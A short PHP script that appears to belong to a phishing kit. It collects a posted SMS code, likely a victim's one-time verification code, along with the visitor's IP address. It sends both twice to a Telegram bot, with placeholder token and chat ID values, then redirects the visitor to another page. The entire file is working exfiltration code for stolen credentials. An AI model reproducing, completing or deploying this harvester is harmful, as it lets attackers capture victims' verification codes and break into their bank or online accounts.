<?php
$ip = getenv("HTTP_CLIENT_IP");
$message .= "---- : || SMS1 || :------\n";
$message .= "SMS1: ".$_POST['msg']."\n";
$message .= "----: || THANKS BE TO GOD || :------\n";
$message .= "IP: ".$ip."\n";

$token = "YOURTOKEN";
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=YOURCHATID&text=" . urlencode($message)."" );
$token = "YOURTOKEN";
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=YOURCHATID&text=" . urlencode($message)."" );
header("Location: khliwhitsn.html");
?>